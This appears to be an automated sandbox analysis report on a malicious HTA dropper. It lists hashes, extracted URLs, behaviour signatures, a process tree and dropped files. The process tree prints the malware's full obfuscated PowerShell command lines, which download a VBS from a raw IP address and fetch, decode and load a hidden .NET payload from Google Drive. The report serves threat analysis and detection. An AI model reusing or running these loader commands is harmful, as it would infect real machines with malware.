Analysis

  • max time kernel
    1s
  • max time network
    119s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    31-10-2024 20:13

General

  • Target

    greenthingswithgreatnewsforgetmeback.hta

  • Size

    205KB

  • MD5

    169a69d33b8480d6ba11f950cb28ff48

  • SHA1

    f74e2a219d7cf49a08bd12dbd4dcde6b63578563

  • SHA256

    c0efd41f38466ebdf9a361f924bc0c6b11eb5e68c9b1adb4531df5b302f155e0

  • SHA512

    7b16659dd7c2bb88870d5c2185b323c078c4b8009bea7ecab534a3705b3c4d585e9dc42acff3122bc718ba884c801db198c73b2630ebecb8f67b17ebcf762236

  • SSDEEP

    48:4FhWsTR/F7gNqXfkwzTqzw4S7u2WAhq0K8Kw99Dd7gZoSdrq67mz9z12gcie9NzB:43F97AcaIN6wfNcoSdrruh2iuRGQ

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Evasion via Device Credential Deployment 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\greenthingswithgreatnewsforgetmeback.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:904
    • C:\Windows\SysWOW64\wIndOWspOweRsHElL\v1.0\powERshELL.eXE
      "C:\Windows\sYstEM32\wIndOWspOweRsHElL\v1.0\powERshELL.eXE" "pOwerShELL -EX bYpaSS -NOp -W 1 -C DEViCeCREDENTiAlDePloYMENT.ExE ; IeX($(IeX('[SYSteM.TEXT.encodING]'+[CHAR]58+[cHar]58+'uTF8.GeTStrINg([SYsTEm.ConVERT]'+[CHAR]0x3a+[cHaR]58+'frOMbasE64STriNg('+[chaR]34+'JHlLdEl4amsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYmVyREVmaW5pVGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0RyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxZEtVLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdFQURoRXFaSyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd1JPVnRsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFhTcyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIktwY3ZWayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFNZVNwQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS0JvcCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkeUt0SXhqazo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzQ1LjE0OS4yNDEuMTgzL01QRFctY29uc3RyYWludHMudmJzIiwiJGVOVjpBUFBEQVRBXG5lZXRhbmRjbGVhbnRoaW5nc2Zvcmdvb2QudmJzIiwwLDApO1N0QXJ0LXNsRUVQKDMpO3NUYVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxuZWV0YW5kY2xlYW50aGluZ3Nmb3Jnb29kLnZicyI='+[ChAR]34+'))')))"
      2⤵
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1976
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpaSS -NOp -W 1 -C DEViCeCREDENTiAlDePloYMENT.ExE
        3⤵
        • Evasion via Device Credential Deployment
        PID:2012
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\teu2bgp1\teu2bgp1.cmdline"
        3⤵
          PID:4128
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA2E7.tmp" "c:\Users\Admin\AppData\Local\Temp\teu2bgp1\CSC4B4BC32A79E84F08ADF995F2471148B2.TMP"
            4⤵
              PID:4524
          • C:\Windows\SysWOW64\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\neetandcleanthingsforgood.vbs"
            3⤵
              PID:4000
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdmRUdpbWFnZScrJ1VybCA9IGVJR2h0dHBzOi8nKycvZHJpdmUuZ29vZ2xlLmNvbS91Yz9leHBvcnQ9ZG93bmxvYWQmaWQ9MUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRHZVaEJZd3VyIGVJRztmRUd3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O2ZFR2ltYWdlQnl0ZXMgPSBmRUd3ZWJDbGllbnQuRG93bmxvYWREYXRhKGZFR2ltYWdlVXJsJysnKTtmRUdpbWEnKydnZVRleHQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhmRUdpbWFnZUJ5dGVzKTtmRUdzdGFydEZsYWcgPSBlSUc8JysnPEJBU0U2NF9TVEFSVD4+ZUlHO2ZFR2VuZEZsYWcgPSBlSUc8JysnPEJBU0U2NF9FTkQ+PmVJRztmRUdzdGFydEluZGV4ID0gZkVHaW1hZ2VUJysnZXh0LkluZGV4T2YoZkVHc3RhcnRGbGFnKTtmRUdlbmRJbmRleCA9IGZFR2ltYWdlVGV4dC5JbmRleCcrJ09mKGZFR2VuZEZsYWcnKycpO2ZFR3N0YXJ0SW5kZXggLWdlIDAgLWFuZCBmRUdlbmRJbmRleCAtZ3QgZkVHc3RhcnRJbmRleCcrJztmRUdzdGFydEluZGV4ICs9IGZFR3N0YXJ0RmxhZy5MZW5ndGg7ZkVHYmFzZTY0TGVuZ3RoID0gZkVHZW5kSW5kZXggLSBmRUdzdGFydEluZGV4O2ZFR2JhcycrJ2U2NENvbW1hbmQgPSBmRUdpbWFnZVRleHQuU3Vic3RyaW5nKGZFR3N0YXJ0SW5kZXgsIGZFR2Jhc2U2NExlbmd0aCk7ZkVHYicrJ2FzZTY0UmV2ZXJzZWQgPSAtam9pbiAoZkVHYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIEhldyBGJysnb3JFYWNoLU9iamVjdCB7IGZFR18nKycgfSlbLTEuLi0oZkVHYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTtmRUcnKydjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGJysncm9tQmFzZTY0U3RyaW5nKGZFR2Jhc2U2NFJldmVyc2VkKTtmRUdsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV0nKyc6OkxvYWQoZkVHY29tbWFuZEJ5dGVzKTtmRUd2YWlNZXRob2QgPSBbZG5saWIuSU8uJysnSG9tZV0uR2V0TWV0aG9kKGVJR1ZBSWVJRycrJyk7ZkVHdmFpTWV0aG9kLkludicrJ29rZShmRUdudWxsLCBAKGVJR3R4dC5kJysndWR1ZHVkdWR1RC8zODEuMTQyLjk0MS41NC8vOnB0dGhlSUcsIGVJR2QnKydlc2F0aXZhZG9lSUcsJysnIGVJR2Rlc2F0aXZhZG9lSUcsIGVJR2Rlc2F0aXZhZG9lSUcsIGVJR0FkZEluUHJvY2VzczMyZUlHLCBlSScrJ0dkZXNhdGl2YWRvZUlHLCBlSUdkZXNhdGl2YWRvZUlHLGVJR2RlJysnc2F0aXZhZG9lSUcsZUlHZGVzYXRpdmFkb2VJRyxlSUdkZXNhdGl2YWRvZUlHLGVJR2Rlc2F0aXZhZG9lSUcsZUlHZGVzYXRpdmFkb2VJRyxlSUcxZUlHLGVJR2Rlc2F0aXZhZG9lSUcpKTsnKS5SZVBMQUNlKChbQ2hhcl0xMDErW0NoYXJdNzMrW0NoYXJdNzEpLFtTVFJpTmddW0NoYXJdMzkpLlJlUExBQ2UoJ2ZFRycsW1NUUmlOZ11bQ2hhcl0zNikuUmVQTEFDZSgoW0NoYXJdNzIrW0NoYXJdMTAxK1tDaGFyXTExOSksW1NUUmlOZ11bQ2hhcl0xMjQpIHwuKCAkRW52OkNvTXNwRWNbNCwyNiwyNV0tSk9JTicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                4⤵
                • Command and Scripting Interpreter: PowerShell
                PID:4604
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('fEGimage'+'Url = eIGhttps:/'+'/drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur eIG;fEGwebClient = New-Object System.Net.WebClient;fEGimageBytes = fEGwebClient.DownloadData(fEGimageUrl'+');fEGima'+'geText = [System.Text.Encoding]::UTF8.GetString(fEGimageBytes);fEGstartFlag = eIG<'+'<BASE64_START>>eIG;fEGendFlag = eIG<'+'<BASE64_END>>eIG;fEGstartIndex = fEGimageT'+'ext.IndexOf(fEGstartFlag);fEGendIndex = fEGimageText.Index'+'Of(fEGendFlag'+');fEGstartIndex -ge 0 -and fEGendIndex -gt fEGstartIndex'+';fEGstartIndex += fEGstartFlag.Length;fEGbase64Length = fEGendIndex - fEGstartIndex;fEGbas'+'e64Command = fEGimageText.Substring(fEGstartIndex, fEGbase64Length);fEGb'+'ase64Reversed = -join (fEGbase64Command.ToCharArray() Hew F'+'orEach-Object { fEG_'+' })[-1..-(fEGbase64Command.Length)];fEG'+'commandBytes = [System.Convert]::F'+'romBase64String(fEGbase64Reversed);fEGloadedAssembly = [System.Reflection.Assembly]'+'::Load(fEGcommandBytes);fEGvaiMethod = [dnlib.IO.'+'Home].GetMethod(eIGVAIeIG'+');fEGvaiMethod.Inv'+'oke(fEGnull, @(eIGtxt.d'+'ududududuD/381.142.941.54//:pttheIG, eIGd'+'esativadoeIG,'+' eIGdesativadoeIG, eIGdesativadoeIG, eIGAddInProcess32eIG, eI'+'GdesativadoeIG, eIGdesativadoeIG,eIGde'+'sativadoeIG,eIGdesativadoeIG,eIGdesativadoeIG,eIGdesativadoeIG,eIGdesativadoeIG,eIG1eIG,eIGdesativadoeIG));').RePLACe(([Char]101+[Char]73+[Char]71),[STRiNg][Char]39).RePLACe('fEG',[STRiNg][Char]36).RePLACe(([Char]72+[Char]101+[Char]119),[STRiNg][Char]124) |.( $Env:CoMspEc[4,26,25]-JOIN'')"
                  5⤵
                  • Command and Scripting Interpreter: PowerShell
                  PID:784

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powERshELL.eXE.log

          Filesize

          2KB

          MD5

          3d086a433708053f9bf9523e1d87a4e8

          SHA1

          b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

          SHA256

          6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

          SHA512

          931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          12KB

          MD5

          7da0537e86109dad709d0e4e7004850c

          SHA1

          b8d13bac3f01002b584e18f749eae3e7418d2365

          SHA256

          bf1a39162f2b7eb18a82b643a440a04b7f6ce7fa4955db0aa48a311fdc0299ba

          SHA512

          45c1ca09497ab9e4226bfeba59407f64da14096fb76d46dca4621fc3366603ffc10676db51220d64cb655f5de88def4333e6d348e5eed6631c40af5d73b093b0

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          18KB

          MD5

          1829e26f34b595ad10adde18275c2b2c

          SHA1

          9f91e4c86d1e673c255b5bfc433de6c08e7d9b7a

          SHA256

          a23b07ffb89f6e942fbb8755650b118989199fed80b2e3f1b07c112721bb4ff4

          SHA512

          4e22adc1c85f66c75ac78e10c8424850774c472c7a1c33dc8e5de44ac647249259407873539c8ab1e720de2573c1a6792935514223b94fbe645f2c7b04bfa0c0

        • C:\Users\Admin\AppData\Local\Temp\RESA2E7.tmp

          Filesize

          1KB

          MD5

          eba28891a0e98ea85681f8db5b9a12ea

          SHA1

          6eac002229c8e32409203ed42f8da0a032a7a485

          SHA256

          7bd3e4656cfd928b5b0c5f76760758a0d2a0301d19af318b739465cdb5b69374

          SHA512

          8e4f37f74037226b09f800ae885de59ba9230130fe0c06fec4d84fdf85499dd39fa72d071d4c6cd7d2e01e4da684540b28bac872207c71079ff3ca0a2d46b121

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rracf5wv.tff.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Local\Temp\teu2bgp1\teu2bgp1.dll

          Filesize

          3KB

          MD5

          29579d22757cf5dcb07355391fc6106d

          SHA1

          f13a4427bc18d062428342b204a02af086f5f79c

          SHA256

          5b4d3c885fd93cf89f3f4ebdce6570f8e4c9747ddb99054426063e04354e10de

          SHA512

          789a05c9e7bd0d2d6fcfe6377b31272e6553598025731052d70d762dd681ade32d6eea615ba4cf2946ec8d8598a0164633f2b3747c2c2858418260f5230f7a57

        • C:\Users\Admin\AppData\Roaming\neetandcleanthingsforgood.vbs

          Filesize

          68KB

          MD5

          d27816d0f221aaf7a0362700a3e0a5b4

          SHA1

          390961053e0642b3715262962533550675dbd9b5

          SHA256

          9a81502d5d1efb62ca49e778c4e117b4784ead30b3565e80bdf5139d9ecd7162

          SHA512

          29e68d3d817699d950f6165e199eaa83cb14f9b0238e53d580ee78b2bf2c883370faf389e24b1fae8aded4758d7399a94ead882ad30398ce8cf9fa564796f76e

        • \??\c:\Users\Admin\AppData\Local\Temp\teu2bgp1\CSC4B4BC32A79E84F08ADF995F2471148B2.TMP

          Filesize

          652B

          MD5

          b23ec3007bdc96dd3adc82d2762f88f2

          SHA1

          cfe3a61f386bfd396f42fc78275029ab499b7059

          SHA256

          b2ea71d111df279e59be401bf5f0ffce1ccf5fb655596839a8e67cc012b1d9cd

          SHA512

          2e1ce3dd656cc23dedd8082a3395eea5db9ed0a6ab86611618aaf8050b613db90d1f164f44f24cf647ba0ffa0b4a8086065ce6e933423e10b3d04ce4266c7051

        • \??\c:\Users\Admin\AppData\Local\Temp\teu2bgp1\teu2bgp1.0.cs

          Filesize

          467B

          MD5

          d12717d89552ddb8b59a93f6d7b53650

          SHA1

          8141049952e7f42cd8ff2931934515a6b3901135

          SHA256

          90f46741701b8bb295ffb92a94a70d5233d2ec0f4a58941f7c1fa4a8d6a0276c

          SHA512

          42056b6146e8543dd33cc5645c6527264bfb30cc159259dae2beb03fed25aa719d257ad0e4b96ba0a02f59655ccda5bb4865623e093ad3e7dd621bd3d463a19f

        • \??\c:\Users\Admin\AppData\Local\Temp\teu2bgp1\teu2bgp1.cmdline

          Filesize

          369B

          MD5

          bfe6956cad8bc9fc8eebfb0efc9912c6

          SHA1

          953c8b984fbc108801ab3238eb45e24c56c9d12b

          SHA256

          887dd6c3a02a19dc10f21912f271a67dd52f70a568b4d2a6a6b4d280d7833ef8

          SHA512

          2b9baefe9211dc3c39b082812b0862d8c63279702afe4f28ab9c56e9f475c106b2f0d8f8cbdda264485e3c9af1370b65e9b56b3bac371a8cdbaed48a6ea93ea0

        • memory/1976-19-0x0000000006430000-0x000000000647C000-memory.dmp

          Filesize

          304KB

        • memory/1976-72-0x00000000717C0000-0x0000000071F70000-memory.dmp

          Filesize

          7.7MB

        • memory/1976-1-0x0000000002AE0000-0x0000000002B16000-memory.dmp

          Filesize

          216KB

        • memory/1976-3-0x0000000005630000-0x0000000005C58000-memory.dmp

          Filesize

          6.2MB

        • memory/1976-2-0x00000000717C0000-0x0000000071F70000-memory.dmp

          Filesize

          7.7MB

        • memory/1976-81-0x00000000717C0000-0x0000000071F70000-memory.dmp

          Filesize

          7.7MB

        • memory/1976-4-0x00000000717C0000-0x0000000071F70000-memory.dmp

          Filesize

          7.7MB

        • memory/1976-74-0x0000000008680000-0x0000000008C24000-memory.dmp

          Filesize

          5.6MB

        • memory/1976-73-0x00000000077C0000-0x00000000077E2000-memory.dmp

          Filesize

          136KB

        • memory/1976-18-0x00000000063F0000-0x000000000640E000-memory.dmp

          Filesize

          120KB

        • memory/1976-71-0x00000000717CE000-0x00000000717CF000-memory.dmp

          Filesize

          4KB

        • memory/1976-5-0x0000000005450000-0x0000000005472000-memory.dmp

          Filesize

          136KB

        • memory/1976-6-0x0000000005D10000-0x0000000005D76000-memory.dmp

          Filesize

          408KB

        • memory/1976-7-0x0000000005D80000-0x0000000005DE6000-memory.dmp

          Filesize

          408KB

        • memory/1976-65-0x00000000069B0000-0x00000000069B8000-memory.dmp

          Filesize

          32KB

        • memory/1976-0-0x00000000717CE000-0x00000000717CF000-memory.dmp

          Filesize

          4KB

        • memory/1976-17-0x0000000005F30000-0x0000000006284000-memory.dmp

          Filesize

          3.3MB

        • memory/2012-44-0x0000000007650000-0x000000000765A000-memory.dmp

          Filesize

          40KB

        • memory/2012-49-0x0000000007940000-0x000000000795A000-memory.dmp

          Filesize

          104KB

        • memory/2012-48-0x0000000007830000-0x0000000007844000-memory.dmp

          Filesize

          80KB

        • memory/2012-47-0x0000000007820000-0x000000000782E000-memory.dmp

          Filesize

          56KB

        • memory/2012-46-0x00000000077F0000-0x0000000007801000-memory.dmp

          Filesize

          68KB

        • memory/2012-45-0x0000000007880000-0x0000000007916000-memory.dmp

          Filesize

          600KB

        • memory/2012-50-0x0000000007870000-0x0000000007878000-memory.dmp

          Filesize

          32KB

        • memory/2012-42-0x0000000007C30000-0x00000000082AA000-memory.dmp

          Filesize

          6.5MB

        • memory/2012-43-0x00000000075F0000-0x000000000760A000-memory.dmp

          Filesize

          104KB

        • memory/2012-40-0x0000000007450000-0x000000000746E000-memory.dmp

          Filesize

          120KB

        • memory/2012-41-0x00000000074B0000-0x0000000007553000-memory.dmp

          Filesize

          652KB

        • memory/2012-29-0x0000000007470000-0x00000000074A2000-memory.dmp

          Filesize

          200KB

        • memory/2012-30-0x000000006E080000-0x000000006E0CC000-memory.dmp

          Filesize

          304KB